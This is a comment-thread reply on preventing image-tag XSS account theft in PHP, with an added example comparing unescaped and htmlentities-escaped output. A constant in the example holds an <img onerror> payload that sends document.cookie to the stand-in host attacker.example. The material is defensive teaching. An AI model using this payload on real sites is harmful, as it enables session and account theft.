re: Stealing Accounts with an IMG Tag


I read all of this and anticipated the part where you tell me how to avoid it and instead only got "go investigate htmlentities" :/


Thanks for checking the article out! I've updated the article to be more detailed in this area, but I'll include that in this reply as well. When you allow a user to post text to your site, you take the text they posted on the backend and escape it with the htmlentities function if you're using PHP.

$postedText = htmlentities($postedText);

It's just that simple. This will get rid of any img tags that users try to inject.
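To make the escaping step concrete, here is an added example (not code from the original article or its author) that renders a constructed hostile comment both without and with output escaping. The payload string, the `renderUnsafe`/`renderSafe` helpers and the `attacker.example` host are all made up for illustration; `htmlentities` is the real PHP function the reply refers to.

```php
<?php
// Added example, not from the original post: a constructed comment body
// carrying the kind of <img> payload the article discusses, rendered two ways.
declare(strict_types=1);

// Constructed attacker input. If this reaches the page unescaped, the onerror
// handler runs in every viewer's browser and ships their cookies off-site.
const HOSTILE_COMMENT = '<img src="x" onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">';

/** Vulnerable: interpolates user-supplied text straight into the HTML. */
function renderUnsafe(string $comment): string
{
    return "<p class=\"comment\">$comment</p>";
}

/**
 * Hardened: escape at output time. Flags and charset are passed explicitly
 * because PHP before 8.1 defaulted to ENT_COMPAT, which leaves single quotes
 * alone and so does not protect single-quoted attribute values.
 */
function escapeHtml(string $text): string
{
    return htmlentities($text, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function renderSafe(string $comment): string
{
    return '<p class="comment">' . escapeHtml($comment) . '</p>';
}

/** Simple check: does a live <img ...> tag survive in the rendered markup? */
function containsLiveImgTag(string $html): bool
{
    return (bool) preg_match('/<img\b/i', $html);
}

$unsafe = renderUnsafe(HOSTILE_COMMENT);
$safe   = renderSafe(HOSTILE_COMMENT);

echo "Unsafe: $unsafe\n";
echo "Safe:   $safe\n";
echo 'Unsafe output contains a live <img>: ', containsLiveImgTag($unsafe) ? 'yes' : 'no', "\n";
echo 'Safe output contains a live <img>:   ', containsLiveImgTag($safe) ? 'yes' : 'no', "\n";
```

In the escaped output the tag arrives as `&lt;img src=&quot;x&quot; ...&gt;`, which the browser displays as literal text instead of parsing as an element. Two practical notes: escape when you render rather than when you store, so the original text is still available for other outputs, and remember that `htmlentities` is the right tool only for HTML text and attribute contexts; text dropped into a `<script>` block, a URL or a CSS value needs the encoding appropriate to that context.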
